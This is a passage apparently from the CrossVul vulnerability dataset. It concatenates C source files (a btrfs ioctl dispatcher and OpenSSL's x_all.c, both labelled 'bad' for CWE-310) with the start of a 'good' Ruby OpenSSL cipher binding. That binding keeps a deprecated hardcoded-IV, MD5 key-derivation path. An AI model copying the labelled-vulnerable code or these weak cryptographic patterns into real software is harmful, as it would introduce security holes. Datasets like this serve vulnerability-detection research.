return btrfs_ioctl_ino_to_path(root, argp);
case BTRFS_IOC_LOGICAL_INO:
return btrfs_ioctl_logical_to_ino(root, argp);
case BTRFS_IOC_SPACE_INFO:
return btrfs_ioctl_space_info(root, argp);
case BTRFS_IOC_SYNC:
btrfs_sync_fs(file->f_dentry->d_sb, 1);
return 0;
case BTRFS_IOC_START_SYNC:
return btrfs_ioctl_start_sync(root, argp);
case BTRFS_IOC_WAIT_SYNC:
return btrfs_ioctl_wait_sync(root, argp);
case BTRFS_IOC_SCRUB:
return btrfs_ioctl_scrub(file, argp);
case BTRFS_IOC_SCRUB_CANCEL:
return btrfs_ioctl_scrub_cancel(root, argp);
case BTRFS_IOC_SCRUB_PROGRESS:
return btrfs_ioctl_scrub_progress(root, argp);
case BTRFS_IOC_BALANCE_V2:
return btrfs_ioctl_balance(file, argp);
case BTRFS_IOC_BALANCE_CTL:
return btrfs_ioctl_balance_ctl(root, arg);
case BTRFS_IOC_BALANCE_PROGRESS:
return btrfs_ioctl_balance_progress(root, argp);
case BTRFS_IOC_SET_RECEIVED_SUBVOL:
return btrfs_ioctl_set_received_subvol(file, argp);
case BTRFS_IOC_SEND:
return btrfs_ioctl_send(file, argp);
case BTRFS_IOC_GET_DEV_STATS:
return btrfs_ioctl_get_dev_stats(root, argp);
case BTRFS_IOC_QUOTA_CTL:
return btrfs_ioctl_quota_ctl(file, argp);
case BTRFS_IOC_QGROUP_ASSIGN:
return btrfs_ioctl_qgroup_assign(file, argp);
case BTRFS_IOC_QGROUP_CREATE:
return btrfs_ioctl_qgroup_create(file, argp);
case BTRFS_IOC_QGROUP_LIMIT:
return btrfs_ioctl_qgroup_limit(file, argp);
case BTRFS_IOC_DEV_REPLACE:
return btrfs_ioctl_dev_replace(root, argp);
}
return -ENOTTY;
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_3783_3 |
crossvul-cpp_data_bad_2309_4 | /* crypto/x509/x_all.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are adhered to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the routines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <openssl/stack.h>
#include "cryptlib.h"
#include <openssl/buffer.h>
#include <openssl/asn1.h>
#include <openssl/evp.h>
#include <openssl/x509.h>
#include <openssl/ocsp.h>
#ifndef OPENSSL_NO_RSA
#include <openssl/rsa.h>
#endif
#ifndef OPENSSL_NO_DSA
#include <openssl/dsa.h>
#endif
int X509_verify(X509 *a, EVP_PKEY *r)
{
return(ASN1_item_verify(ASN1_ITEM_rptr(X509_CINF),a->sig_alg,
a->signature,a->cert_info,r));
}
int X509_REQ_verify(X509_REQ *a, EVP_PKEY *r)
{
return( ASN1_item_verify(ASN1_ITEM_rptr(X509_REQ_INFO),
a->sig_alg,a->signature,a->req_info,r));
}
int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a, EVP_PKEY *r)
{
return(ASN1_item_verify(ASN1_ITEM_rptr(NETSCAPE_SPKAC),
a->sig_algor,a->signature,a->spkac,r));
}
int X509_sign(X509 *x, EVP_PKEY *pkey, const EVP_MD *md)
{
x->cert_info->enc.modified = 1;
return(ASN1_item_sign(ASN1_ITEM_rptr(X509_CINF), x->cert_info->signature,
x->sig_alg, x->signature, x->cert_info,pkey,md));
}
int X509_sign_ctx(X509 *x, EVP_MD_CTX *ctx)
{
x->cert_info->enc.modified = 1;
return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_CINF),
x->cert_info->signature,
x->sig_alg, x->signature, x->cert_info, ctx);
}
int X509_http_nbio(OCSP_REQ_CTX *rctx, X509 **pcert)
{
return OCSP_REQ_CTX_nbio_d2i(rctx,
(ASN1_VALUE **)pcert, ASN1_ITEM_rptr(X509));
}
int X509_REQ_sign(X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md)
{
return(ASN1_item_sign(ASN1_ITEM_rptr(X509_REQ_INFO),x->sig_alg, NULL,
x->signature, x->req_info,pkey,md));
}
int X509_REQ_sign_ctx(X509_REQ *x, EVP_MD_CTX *ctx)
{
return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_REQ_INFO),
x->sig_alg, NULL, x->signature, x->req_info, ctx);
}
int X509_CRL_sign(X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md)
{
x->crl->enc.modified = 1;
return(ASN1_item_sign(ASN1_ITEM_rptr(X509_CRL_INFO),x->crl->sig_alg,
x->sig_alg, x->signature, x->crl,pkey,md));
}
int X509_CRL_sign_ctx(X509_CRL *x, EVP_MD_CTX *ctx)
{
x->crl->enc.modified = 1;
return ASN1_item_sign_ctx(ASN1_ITEM_rptr(X509_CRL_INFO),
x->crl->sig_alg, x->sig_alg, x->signature, x->crl, ctx);
}
int X509_CRL_http_nbio(OCSP_REQ_CTX *rctx, X509_CRL **pcrl)
{
return OCSP_REQ_CTX_nbio_d2i(rctx,
(ASN1_VALUE **)pcrl, ASN1_ITEM_rptr(X509_CRL));
}
int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *x, EVP_PKEY *pkey, const EVP_MD *md)
{
return(ASN1_item_sign(ASN1_ITEM_rptr(NETSCAPE_SPKAC), x->sig_algor,NULL,
x->signature, x->spkac,pkey,md));
}
#ifndef OPENSSL_NO_FP_API
X509 *d2i_X509_fp(FILE *fp, X509 **x509)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509), fp, x509);
}
int i2d_X509_fp(FILE *fp, X509 *x509)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509), fp, x509);
}
#endif
X509 *d2i_X509_bio(BIO *bp, X509 **x509)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509), bp, x509);
}
int i2d_X509_bio(BIO *bp, X509 *x509)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509), bp, x509);
}
#ifndef OPENSSL_NO_FP_API
X509_CRL *d2i_X509_CRL_fp(FILE *fp, X509_CRL **crl)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509_CRL), fp, crl);
}
int i2d_X509_CRL_fp(FILE *fp, X509_CRL *crl)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509_CRL), fp, crl);
}
#endif
X509_CRL *d2i_X509_CRL_bio(BIO *bp, X509_CRL **crl)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509_CRL), bp, crl);
}
int i2d_X509_CRL_bio(BIO *bp, X509_CRL *crl)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509_CRL), bp, crl);
}
#ifndef OPENSSL_NO_FP_API
PKCS7 *d2i_PKCS7_fp(FILE *fp, PKCS7 **p7)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(PKCS7), fp, p7);
}
int i2d_PKCS7_fp(FILE *fp, PKCS7 *p7)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(PKCS7), fp, p7);
}
#endif
PKCS7 *d2i_PKCS7_bio(BIO *bp, PKCS7 **p7)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(PKCS7), bp, p7);
}
int i2d_PKCS7_bio(BIO *bp, PKCS7 *p7)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(PKCS7), bp, p7);
}
#ifndef OPENSSL_NO_FP_API
X509_REQ *d2i_X509_REQ_fp(FILE *fp, X509_REQ **req)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(X509_REQ), fp, req);
}
int i2d_X509_REQ_fp(FILE *fp, X509_REQ *req)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(X509_REQ), fp, req);
}
#endif
X509_REQ *d2i_X509_REQ_bio(BIO *bp, X509_REQ **req)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(X509_REQ), bp, req);
}
int i2d_X509_REQ_bio(BIO *bp, X509_REQ *req)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(X509_REQ), bp, req);
}
#ifndef OPENSSL_NO_RSA
#ifndef OPENSSL_NO_FP_API
RSA *d2i_RSAPrivateKey_fp(FILE *fp, RSA **rsa)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(RSAPrivateKey), fp, rsa);
}
int i2d_RSAPrivateKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPrivateKey), fp, rsa);
}
RSA *d2i_RSAPublicKey_fp(FILE *fp, RSA **rsa)
{
return ASN1_item_d2i_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
RSA *d2i_RSA_PUBKEY_fp(FILE *fp, RSA **rsa)
{
return ASN1_d2i_fp((void *(*)(void))
RSA_new,(D2I_OF(void))d2i_RSA_PUBKEY, fp,
(void **)rsa);
}
int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
int i2d_RSA_PUBKEY_fp(FILE *fp, RSA *rsa)
{
return ASN1_i2d_fp((I2D_OF(void))i2d_RSA_PUBKEY,fp,rsa);
}
#endif
RSA *d2i_RSAPrivateKey_bio(BIO *bp, RSA **rsa)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(RSAPrivateKey), bp, rsa);
}
int i2d_RSAPrivateKey_bio(BIO *bp, RSA *rsa)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(RSAPrivateKey), bp, rsa);
}
RSA *d2i_RSAPublicKey_bio(BIO *bp, RSA **rsa)
{
return ASN1_item_d2i_bio(ASN1_ITEM_rptr(RSAPublicKey), bp, rsa);
}
RSA *d2i_RSA_PUBKEY_bio(BIO *bp, RSA **rsa)
{
return ASN1_d2i_bio_of(RSA,RSA_new,d2i_RSA_PUBKEY,bp,rsa);
}
int i2d_RSAPublicKey_bio(BIO *bp, RSA *rsa)
{
return ASN1_item_i2d_bio(ASN1_ITEM_rptr(RSAPublicKey), bp, rsa);
}
int i2d_RSA_PUBKEY_bio(BIO *bp, RSA *rsa)
{
return ASN1_i2d_bio_of(RSA,i2d_RSA_PUBKEY,bp,rsa);
}
#endif
#ifndef OPENSSL_NO_DSA
#ifndef OPENSSL_NO_FP_API
DSA *d2i_DSAPrivateKey_fp(FILE *fp, DSA **dsa)
{
return ASN1_d2i_fp_of(DSA,DSA_new,d2i_DSAPrivateKey,fp,dsa);
}
int i2d_DSAPrivateKey_fp(FILE *fp, DSA *dsa)
{
return ASN1_i2d_fp_of_const(DSA,i2d_DSAPrivateKey,fp,dsa);
}
DSA *d2i_DSA_PUBKEY_fp(FILE *fp, DSA **dsa)
{
return ASN1_d2i_fp_of(DSA,DSA_new,d2i_DSA_PUBKEY,fp,dsa);
}
int i2d_DSA_PUBKEY_fp(FILE *fp, DSA *dsa)
{
return ASN1_i2d_fp_of(DSA,i2d_DSA_PUBKEY,fp,dsa);
}
#endif
DSA *d2i_DSAPrivateKey_bio(BIO *bp, DSA **dsa)
{
return ASN1_d2i_bio_of(DSA,DSA_new,d2i_DSAPrivateKey,bp,dsa
);
}
int i2d_DSAPrivateKey_bio(BIO *bp, DSA *dsa)
{
return ASN1_i2d_bio_of_const(DSA,i2d_DSAPrivateKey,bp,dsa);
}
DSA *d2i_DSA_PUBKEY_bio(BIO *bp, DSA **dsa)
{
return ASN1_d2i_bio_of(DSA,DSA_new,d2i_DSA_PUBKEY,bp,dsa);
}
int i2d_DSA_PUBKEY_bio(BIO *bp, DSA *dsa)
{
return ASN1_i2d_bio_of(DSA,i2d_DSA_PUBKEY,bp,dsa);
}
#endif
#ifndef OPENSSL_NO_EC
#ifndef OPENSSL_NO_FP_API
EC_KEY *d2i_EC_PUBKEY_fp(FILE *fp, EC_KEY **eckey)
{
return ASN1_d2i_fp_of(EC_KEY,EC_KEY_new,d2i_EC_PUBKEY,fp,eckey);
}
int i2d_EC_PUBKEY_fp(FILE *fp, EC_KEY *eckey)
{
return ASN1_i2d_fp_of(EC_KEY,i2d_EC_PUBKEY,fp,eckey);
}
EC_KEY *d2i_ECPrivateKey_fp(FILE *fp, EC_KEY **eckey)
{
return ASN1_d2i_fp_of(EC_KEY,EC_KEY_new,d2i_ECPrivateKey,fp,eckey);
}
int i2d_ECPrivateKey_fp(FILE *fp, EC_KEY *eckey)
{
return ASN1_i2d_fp_of(EC_KEY,i2d_ECPrivateKey,fp,eckey);
}
#endif
EC_KEY *d2i_EC_PUBKEY_bio(BIO *bp, EC_KEY **eckey)
{
return ASN1_d2i_bio_of(EC_KEY,EC_KEY_new,d2i_EC_PUBKEY,bp,eckey);
}
int i2d_EC_PUBKEY_bio(BIO *bp, EC_KEY *ecdsa)
{
return ASN1_i2d_bio_of(EC_KEY,i2d_EC_PUBKEY,bp,ecdsa);
}
EC_KEY *d2i_ECPrivateKey_bio(BIO *bp, EC_KEY **eckey)
{
return ASN1_d2i_bio_of(EC_KEY,EC_KEY_new,d2i_ECPrivateKey,bp,eckey);
}
int i2d_ECPrivateKey_bio(BIO *bp, EC_KEY *eckey)
{
return ASN1_i2d_bio_of(EC_KEY,i2d_ECPrivateKey,bp,eckey);
}
#endif
int X509_pubkey_digest(const X509 *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
ASN1_BIT_STRING *key;
key = X509_get0_pubkey_bitstr(data);
if(!key) return 0;
return EVP_Digest(key->data, key->length, md, len, type, NULL);
}
int X509_digest(const X509 *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509),type,(char *)data,md,len));
}
int X509_CRL_digest(const X509_CRL *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509_CRL),type,(char *)data,md,len));
}
int X509_REQ_digest(const X509_REQ *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509_REQ),type,(char *)data,md,len));
}
int X509_NAME_digest(const X509_NAME *data, const EVP_MD *type, unsigned char *md,
unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(X509_NAME),type,(char *)data,md,len));
}
int PKCS7_ISSUER_AND_SERIAL_digest(PKCS7_ISSUER_AND_SERIAL *data, const EVP_MD *type,
unsigned char *md, unsigned int *len)
{
return(ASN1_item_digest(ASN1_ITEM_rptr(PKCS7_ISSUER_AND_SERIAL),type,
(char *)data,md,len));
}
#ifndef OPENSSL_NO_FP_API
X509_SIG *d2i_PKCS8_fp(FILE *fp, X509_SIG **p8)
{
return ASN1_d2i_fp_of(X509_SIG,X509_SIG_new,d2i_X509_SIG,fp,p8);
}
int i2d_PKCS8_fp(FILE *fp, X509_SIG *p8)
{
return ASN1_i2d_fp_of(X509_SIG,i2d_X509_SIG,fp,p8);
}
#endif
X509_SIG *d2i_PKCS8_bio(BIO *bp, X509_SIG **p8)
{
return ASN1_d2i_bio_of(X509_SIG,X509_SIG_new,d2i_X509_SIG,bp,p8);
}
int i2d_PKCS8_bio(BIO *bp, X509_SIG *p8)
{
return ASN1_i2d_bio_of(X509_SIG,i2d_X509_SIG,bp,p8);
}
#ifndef OPENSSL_NO_FP_API
PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,
PKCS8_PRIV_KEY_INFO **p8inf)
{
return ASN1_d2i_fp_of(PKCS8_PRIV_KEY_INFO,PKCS8_PRIV_KEY_INFO_new,
d2i_PKCS8_PRIV_KEY_INFO,fp,p8inf);
}
int i2d_PKCS8_PRIV_KEY_INFO_fp(FILE *fp, PKCS8_PRIV_KEY_INFO *p8inf)
{
return ASN1_i2d_fp_of(PKCS8_PRIV_KEY_INFO,i2d_PKCS8_PRIV_KEY_INFO,fp,
p8inf);
}
int i2d_PKCS8PrivateKeyInfo_fp(FILE *fp, EVP_PKEY *key)
{
PKCS8_PRIV_KEY_INFO *p8inf;
int ret;
p8inf = EVP_PKEY2PKCS8(key);
if(!p8inf) return 0;
ret = i2d_PKCS8_PRIV_KEY_INFO_fp(fp, p8inf);
PKCS8_PRIV_KEY_INFO_free(p8inf);
return ret;
}
int i2d_PrivateKey_fp(FILE *fp, EVP_PKEY *pkey)
{
return ASN1_i2d_fp_of(EVP_PKEY,i2d_PrivateKey,fp,pkey);
}
EVP_PKEY *d2i_PrivateKey_fp(FILE *fp, EVP_PKEY **a)
{
return ASN1_d2i_fp_of(EVP_PKEY,EVP_PKEY_new,d2i_AutoPrivateKey,fp,a);
}
int i2d_PUBKEY_fp(FILE *fp, EVP_PKEY *pkey)
{
return ASN1_i2d_fp_of(EVP_PKEY,i2d_PUBKEY,fp,pkey);
}
EVP_PKEY *d2i_PUBKEY_fp(FILE *fp, EVP_PKEY **a)
{
return ASN1_d2i_fp_of(EVP_PKEY,EVP_PKEY_new,d2i_PUBKEY,fp,a);
}
#endif
PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,
PKCS8_PRIV_KEY_INFO **p8inf)
{
return ASN1_d2i_bio_of(PKCS8_PRIV_KEY_INFO,PKCS8_PRIV_KEY_INFO_new,
d2i_PKCS8_PRIV_KEY_INFO,bp,p8inf);
}
int i2d_PKCS8_PRIV_KEY_INFO_bio(BIO *bp, PKCS8_PRIV_KEY_INFO *p8inf)
{
return ASN1_i2d_bio_of(PKCS8_PRIV_KEY_INFO,i2d_PKCS8_PRIV_KEY_INFO,bp,
p8inf);
}
int i2d_PKCS8PrivateKeyInfo_bio(BIO *bp, EVP_PKEY *key)
{
PKCS8_PRIV_KEY_INFO *p8inf;
int ret;
p8inf = EVP_PKEY2PKCS8(key);
if(!p8inf) return 0;
ret = i2d_PKCS8_PRIV_KEY_INFO_bio(bp, p8inf);
PKCS8_PRIV_KEY_INFO_free(p8inf);
return ret;
}
int i2d_PrivateKey_bio(BIO *bp, EVP_PKEY *pkey)
{
return ASN1_i2d_bio_of(EVP_PKEY,i2d_PrivateKey,bp,pkey);
}
EVP_PKEY *d2i_PrivateKey_bio(BIO *bp, EVP_PKEY **a)
{
return ASN1_d2i_bio_of(EVP_PKEY,EVP_PKEY_new,d2i_AutoPrivateKey,bp,a);
}
int i2d_PUBKEY_bio(BIO *bp, EVP_PKEY *pkey)
{
return ASN1_i2d_bio_of(EVP_PKEY,i2d_PUBKEY,bp,pkey);
}
EVP_PKEY *d2i_PUBKEY_bio(BIO *bp, EVP_PKEY **a)
{
return ASN1_d2i_bio_of(EVP_PKEY,EVP_PKEY_new,d2i_PUBKEY,bp,a);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_2309_4 |
crossvul-cpp_data_good_5329_0 | /*
* 'OpenSSL for Ruby' project
* Copyright (C) 2001-2002 Michal Rokos <m.rokos@sh.cvut.cz>
* All rights reserved.
*/
/*
* This program is licensed under the same licence as Ruby.
* (See the file 'LICENCE'.)
*/
#include "ossl.h"
#define NewCipher(klass) \
TypedData_Wrap_Struct((klass), &ossl_cipher_type, 0)
#define AllocCipher(obj, ctx) do { \
(ctx) = EVP_CIPHER_CTX_new(); \
if (!(ctx)) \
ossl_raise(rb_eRuntimeError, NULL); \
RTYPEDDATA_DATA(obj) = (ctx); \
} while (0)
#define GetCipherInit(obj, ctx) do { \
TypedData_Get_Struct((obj), EVP_CIPHER_CTX, &ossl_cipher_type, (ctx)); \
} while (0)
#define GetCipher(obj, ctx) do { \
GetCipherInit((obj), (ctx)); \
if (!(ctx)) { \
ossl_raise(rb_eRuntimeError, "Cipher not inititalized!"); \
} \
} while (0)
#define SafeGetCipher(obj, ctx) do { \
OSSL_Check_Kind((obj), cCipher); \
GetCipher((obj), (ctx)); \
} while (0)
/*
* Classes
*/
VALUE cCipher;
VALUE eCipherError;
static ID id_auth_tag_len, id_key_set;
static VALUE ossl_cipher_alloc(VALUE klass);
static void ossl_cipher_free(void *ptr);
static const rb_data_type_t ossl_cipher_type = {
"OpenSSL/Cipher",
{
0, ossl_cipher_free,
},
0, 0, RUBY_TYPED_FREE_IMMEDIATELY,
};
/*
* PUBLIC
*/
const EVP_CIPHER *
GetCipherPtr(VALUE obj)
{
if (rb_obj_is_kind_of(obj, cCipher)) {
EVP_CIPHER_CTX *ctx;
GetCipher(obj, ctx);
return EVP_CIPHER_CTX_cipher(ctx);
}
else {
const EVP_CIPHER *cipher;
StringValueCStr(obj);
cipher = EVP_get_cipherbyname(RSTRING_PTR(obj));
if (!cipher)
ossl_raise(rb_eArgError,
"unsupported cipher algorithm: %"PRIsVALUE, obj);
return cipher;
}
}
VALUE
ossl_cipher_new(const EVP_CIPHER *cipher)
{
VALUE ret;
EVP_CIPHER_CTX *ctx;
ret = ossl_cipher_alloc(cCipher);
AllocCipher(ret, ctx);
if (EVP_CipherInit_ex(ctx, cipher, NULL, NULL, NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
return ret;
}
/*
* PRIVATE
*/
static void
ossl_cipher_free(void *ptr)
{
EVP_CIPHER_CTX_free(ptr);
}
static VALUE
ossl_cipher_alloc(VALUE klass)
{
return NewCipher(klass);
}
/*
* call-seq:
* Cipher.new(string) -> cipher
*
* The string must contain a valid cipher name like "AES-128-CBC" or "3DES".
*
* A list of cipher names is available by calling OpenSSL::Cipher.ciphers.
*/
static VALUE
ossl_cipher_initialize(VALUE self, VALUE str)
{
EVP_CIPHER_CTX *ctx;
const EVP_CIPHER *cipher;
char *name;
name = StringValueCStr(str);
GetCipherInit(self, ctx);
if (ctx) {
ossl_raise(rb_eRuntimeError, "Cipher already inititalized!");
}
AllocCipher(self, ctx);
if (!(cipher = EVP_get_cipherbyname(name))) {
ossl_raise(rb_eRuntimeError, "unsupported cipher algorithm (%"PRIsVALUE")", str);
}
if (EVP_CipherInit_ex(ctx, cipher, NULL, NULL, NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
return self;
}
static VALUE
ossl_cipher_copy(VALUE self, VALUE other)
{
EVP_CIPHER_CTX *ctx1, *ctx2;
rb_check_frozen(self);
if (self == other) return self;
GetCipherInit(self, ctx1);
if (!ctx1) {
AllocCipher(self, ctx1);
}
SafeGetCipher(other, ctx2);
if (EVP_CIPHER_CTX_copy(ctx1, ctx2) != 1)
ossl_raise(eCipherError, NULL);
return self;
}
static void*
add_cipher_name_to_ary(const OBJ_NAME *name, VALUE ary)
{
rb_ary_push(ary, rb_str_new2(name->name));
return NULL;
}
/*
* call-seq:
* OpenSSL::Cipher.ciphers -> array[string...]
*
* Returns the names of all available ciphers in an array.
*/
static VALUE
ossl_s_ciphers(VALUE self)
{
VALUE ary;
ary = rb_ary_new();
OBJ_NAME_do_all_sorted(OBJ_NAME_TYPE_CIPHER_METH,
(void(*)(const OBJ_NAME*,void*))add_cipher_name_to_ary,
(void*)ary);
return ary;
}
/*
* call-seq:
* cipher.reset -> self
*
* Fully resets the internal state of the Cipher. By using this, the same
* Cipher instance may be used several times for encryption or decryption tasks.
*
* Internally calls EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, -1).
*/
static VALUE
ossl_cipher_reset(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
return self;
}
static VALUE
ossl_cipher_init(int argc, VALUE *argv, VALUE self, int mode)
{
EVP_CIPHER_CTX *ctx;
unsigned char key[EVP_MAX_KEY_LENGTH], *p_key = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH], *p_iv = NULL;
VALUE pass, init_v;
if(rb_scan_args(argc, argv, "02", &pass, &init_v) > 0){
/*
* oops. this code mistakes salt for IV.
* We deprecated the arguments for this method, but we decided to keep
* this behaviour for backward compatibility.
*/
VALUE cname = rb_class_path(rb_obj_class(self));
rb_warn("arguments for %"PRIsVALUE"#encrypt and %"PRIsVALUE"#decrypt were deprecated; "
"use %"PRIsVALUE"#pkcs5_keyivgen to derive key and IV",
cname, cname, cname);
StringValue(pass);
GetCipher(self, ctx);
if (NIL_P(init_v)) memcpy(iv, "OpenSSL for Ruby rulez!", sizeof(iv));
else{
StringValue(init_v);
if (EVP_MAX_IV_LENGTH > RSTRING_LEN(init_v)) {
memset(iv, 0, EVP_MAX_IV_LENGTH);
memcpy(iv, RSTRING_PTR(init_v), RSTRING_LEN(init_v));
}
else memcpy(iv, RSTRING_PTR(init_v), sizeof(iv));
}
EVP_BytesToKey(EVP_CIPHER_CTX_cipher(ctx), EVP_md5(), iv,
(unsigned char *)RSTRING_PTR(pass), RSTRING_LENINT(pass), 1, key, NULL);
p_key = key;
p_iv = iv;
}
else {
GetCipher(self, ctx);
}
if (EVP_CipherInit_ex(ctx, NULL, NULL, p_key, p_iv, mode) != 1) {
ossl_raise(eCipherError, NULL);
}
if (p_key)
rb_ivar_set(self, id_key_set, Qtrue);
return self;
}
/*
* call-seq:
* cipher.encrypt -> self
*
* Initializes the Cipher for encryption.
*
* Make sure to call Cipher#encrypt or Cipher#decrypt before using any of the
* following methods:
* * [#key=, #iv=, #random_key, #random_iv, #pkcs5_keyivgen]
*
* Internally calls EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, 1).
*/
static VALUE
ossl_cipher_encrypt(int argc, VALUE *argv, VALUE self)
{
return ossl_cipher_init(argc, argv, self, 1);
}
/*
* call-seq:
* cipher.decrypt -> self
*
* Initializes the Cipher for decryption.
*
* Make sure to call Cipher#encrypt or Cipher#decrypt before using any of the
* following methods:
* * [#key=, #iv=, #random_key, #random_iv, #pkcs5_keyivgen]
*
* Internally calls EVP_CipherInit_ex(ctx, NULL, NULL, NULL, NULL, 0).
*/
static VALUE
ossl_cipher_decrypt(int argc, VALUE *argv, VALUE self)
{
return ossl_cipher_init(argc, argv, self, 0);
}
/*
* call-seq:
* cipher.pkcs5_keyivgen(pass, salt = nil, iterations = 2048, digest = "MD5") -> nil
*
* Generates and sets the key/IV based on a password.
*
* *WARNING*: This method is only PKCS5 v1.5 compliant when using RC2, RC4-40,
* or DES with MD5 or SHA1. Using anything else (like AES) will generate the
* key/iv using an OpenSSL specific method. This method is deprecated and
* should no longer be used. Use a PKCS5 v2 key generation method from
* OpenSSL::PKCS5 instead.
*
* === Parameters
* * +salt+ must be an 8 byte string if provided.
* * +iterations+ is an integer with a default of 2048.
* * +digest+ is a Digest object that defaults to 'MD5'
*
* A minimum of 1000 iterations is recommended.
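*
* A minimal sketch (the password and the 8-octet salt below are made-up
* example values):
*
*   cipher = OpenSSL::Cipher.new('AES-128-CBC')
*   cipher.encrypt
*   cipher.pkcs5_keyivgen('password', '8octsalt', 2048, OpenSSL::Digest::SHA1.new)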
*
*/
static VALUE
ossl_cipher_pkcs5_keyivgen(int argc, VALUE *argv, VALUE self)
{
EVP_CIPHER_CTX *ctx;
const EVP_MD *digest;
VALUE vpass, vsalt, viter, vdigest;
unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH], *salt = NULL;
int iter;
rb_scan_args(argc, argv, "13", &vpass, &vsalt, &viter, &vdigest);
StringValue(vpass);
if(!NIL_P(vsalt)){
StringValue(vsalt);
if(RSTRING_LEN(vsalt) != PKCS5_SALT_LEN)
ossl_raise(eCipherError, "salt must be an 8-octet string");
salt = (unsigned char *)RSTRING_PTR(vsalt);
}
iter = NIL_P(viter) ? 2048 : NUM2INT(viter);
